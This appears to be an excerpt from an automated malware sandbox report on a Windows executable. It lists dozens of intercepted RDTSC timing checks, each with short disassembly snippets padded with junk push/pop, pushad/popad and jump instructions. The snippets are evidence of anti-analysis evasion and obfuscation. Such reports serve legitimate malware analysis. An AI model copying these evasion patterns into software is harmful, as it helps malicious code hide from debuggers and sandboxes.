Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A91B1 second address: 6A91C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A9362 second address: 6A9392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC3507E5388h 0x00000008 jo 00007FC3507E5376h 0x0000000e jnl 00007FC3507E5376h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jg 00007FC3507E5376h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6A9392 second address: 6A9396 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6AA460 second address: 6AA466 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6AA466 second address: 6AA46C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6ADB4C second address: 6ADB50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6ADB50 second address: 6ADB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6AE282 second address: 6AE294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b jp 00007FC3507E5376h 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B539A second address: 6B539E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B4B21 second address: 6B4B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC3507E5381h 0x0000000f popad 0x00000010 push ecx 0x00000011 jo 00007FC3507E5376h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B4B46 second address: 6B4B4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B4F90 second address: 6B4FB5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC3507E5376h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c ja 00007FC3507E5378h 0x00000012 popad 0x00000013 js 00007FC3507E538Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007FC3507E5376h 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B8917 second address: 6B8926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B8926 second address: 6B8945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 jl 00007FC3507E5376h 0x0000000c pop ebx 0x0000000d popad 0x0000000e mov eax, dword ptr [eax] 0x00000010 push eax 0x00000011 push edi 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop edi 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B8945 second address: 6B89A9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pop eax 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007FC350C3E718h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 call 00007FC350C3E719h 0x00000027 jmp 00007FC350C3E71Eh 0x0000002c push eax 0x0000002d pushad 0x0000002e pushad 0x0000002f jnp 00007FC350C3E716h 0x00000035 jmp 00007FC350C3E728h 0x0000003a popad 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B89A9 second address: 6B89DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jns 00007FC3507E538Fh 0x00000011 mov eax, dword ptr [eax] 0x00000013 je 00007FC3507E5380h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B89DF second address: 6B89FA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC350C3E71Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B8C9B second address: 6B8CA1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B8CA1 second address: 6B8CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC350C3E716h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B9565 second address: 6B956B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B956B second address: 6B956F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B956F second address: 6B9585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b mov si, FEF0h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 push edi 0x00000014 pop edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B9585 second address: 6B9598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E71Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6B9A89 second address: 6B9AA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3507E537Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6BA009 second address: 6BA00D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6BA744 second address: 6BA748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6BA748 second address: 6BA74C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6BC3EC second address: 6BC3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3507E537Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6BDD8C second address: 6BDD90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6BDD90 second address: 6BDDA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pushad 0x0000000d jnp 00007FC3507E5376h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6BDDA5 second address: 6BDDAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6BCB5F second address: 6BCB63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6BFDEE second address: 6BFE0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E724h 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 67A0EB second address: 67A0EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C1989 second address: 6C199D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC350C3E720h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C467C second address: 6C4682 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C4682 second address: 6C46B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC350C3E71Eh 0x0000000b jmp 00007FC350C3E729h 0x00000010 pushad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C5C52 second address: 6C5C56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C5C56 second address: 6C5C5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C5C5C second address: 6C5C9C instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC3507E5378h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, dword ptr [ebp+12478FDCh] 0x00000013 push 00000000h 0x00000015 pushad 0x00000016 sbb ch, FFFFFF87h 0x00000019 add dword ptr [ebp+122D2156h], edi 0x0000001f popad 0x00000020 sbb bx, A31Dh 0x00000025 push 00000000h 0x00000027 mov edi, dword ptr [ebp+122D1FDDh] 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 push edx 0x00000031 jmp 00007FC3507E537Ch 0x00000036 pop edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C5C9C second address: 6C5CA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C5CA2 second address: 6C5CA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C6EE2 second address: 6C6EE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C6EE8 second address: 6C6EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C6EEC second address: 6C6F03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FC350C3E71Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C9A3E second address: 6C9A42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6C9C42 second address: 6C9C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6CAC47 second address: 6CAC51 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC3507E537Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6CBCF6 second address: 6CBD00 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6CAC51 second address: 6CACE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sub dword ptr [ebp+122D23FFh], ebx 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push esi 0x00000017 call 00007FC3507E5378h 0x0000001c pop esi 0x0000001d mov dword ptr [esp+04h], esi 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc esi 0x0000002a push esi 0x0000002b ret 0x0000002c pop esi 0x0000002d ret 0x0000002e mov edi, 0358694Fh 0x00000033 movsx ebx, ax 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d movzx edi, di 0x00000040 mov eax, dword ptr [ebp+122D127Dh] 0x00000046 call 00007FC3507E5383h 0x0000004b pushad 0x0000004c je 00007FC3507E5376h 0x00000052 mov dx, BCF0h 0x00000056 popad 0x00000057 pop edi 0x00000058 mov ebx, 48D2F867h 0x0000005d push FFFFFFFFh 0x0000005f jmp 00007FC3507E537Dh 0x00000064 nop 0x00000065 jmp 00007FC3507E537Ah 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d push ebx 0x0000006e pushad 0x0000006f popad 0x00000070 pop ebx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6CBD00 second address: 6CBD5E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC350C3E71Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FC350C3E718h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov bl, 14h 0x00000029 push 00000000h 0x0000002b clc 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push edx 0x00000031 call 00007FC350C3E718h 0x00000036 pop edx 0x00000037 mov dword ptr [esp+04h], edx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc edx 0x00000044 push edx 0x00000045 ret 0x00000046 pop edx 0x00000047 ret 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c pushad 0x0000004d popad 0x0000004e pop eax 0x0000004f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6CACE6 second address: 6CACEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6CACEC second address: 6CACF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6D0E25 second address: 6D0E2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6D0E2A second address: 6D0E30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6CCE6B second address: 6CCE76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FC3507E5376h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6D0E30 second address: 6D0E34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6CCE76 second address: 6CCEA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC3507E5386h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC3507E537Ah 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6D0E34 second address: 6D0E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6D0E38 second address: 6D0E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC3507E5380h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6D1E80 second address: 6D1EA9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC350C3E716h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FC350C3E72Bh 0x00000014 jmp 00007FC350C3E725h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6D1EA9 second address: 6D1F30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push esi 0x0000000c call 00007FC3507E5378h 0x00000011 pop esi 0x00000012 mov dword ptr [esp+04h], esi 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc esi 0x0000001f push esi 0x00000020 ret 0x00000021 pop esi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 push 00000000h 0x00000027 push ecx 0x00000028 call 00007FC3507E5378h 0x0000002d pop ecx 0x0000002e mov dword ptr [esp+04h], ecx 0x00000032 add dword ptr [esp+04h], 00000015h 0x0000003a inc ecx 0x0000003b push ecx 0x0000003c ret 0x0000003d pop ecx 0x0000003e ret 0x0000003f je 00007FC3507E5393h 0x00000045 pushad 0x00000046 mov dword ptr [ebp+1246E893h], edi 0x0000004c call 00007FC3507E5384h 0x00000051 pop eax 0x00000052 popad 0x00000053 mov bx, EBDEh 0x00000057 push 00000000h 0x00000059 movzx ebx, bx 0x0000005c xchg eax, esi 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FC3507E537Fh 0x00000064 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6D1F30 second address: 6D1F62 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E723h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007FC350C3E734h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC350C3E722h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6D2E90 second address: 6D2E94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6D4134 second address: 6D4139 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6DBDDA second address: 6DBDF6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FC3507E537Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC3507E537Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6DBDF6 second address: 6DBE0E instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC350C3E716h 0x00000008 jmp 00007FC350C3E71Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6DB4CE second address: 6DB4E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jg 00007FC3507E5376h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E1D45 second address: 6E1DB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC350C3E71Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e jmp 00007FC350C3E723h 0x00000013 jmp 00007FC350C3E720h 0x00000018 popad 0x00000019 mov eax, dword ptr [eax] 0x0000001b pushad 0x0000001c push edi 0x0000001d jmp 00007FC350C3E724h 0x00000022 pop edi 0x00000023 jmp 00007FC350C3E720h 0x00000028 popad 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d pushad 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E5962 second address: 6E5983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3507E5389h 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E6078 second address: 6E607C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E607C second address: 6E6082 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E6221 second address: 6E6235 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC350C3E71Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E6235 second address: 6E6239 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E638F second address: 6E63A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jl 00007FC350C3E718h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E63A2 second address: 6E63A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E6665 second address: 6E666F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E6A85 second address: 6E6AAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FC3507E5376h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jmp 00007FC3507E537Eh 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 jl 00007FC3507E5376h 0x0000001c pop eax 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E6AAE second address: 6E6ACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC350C3E722h 0x00000009 push eax 0x0000000a pop eax 0x0000000b jnp 00007FC350C3E716h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SUAosT64HD.exe	RDTSC instruction interceptor: First address: 6E6ACD second address: 6E6AEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC3507E5388h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
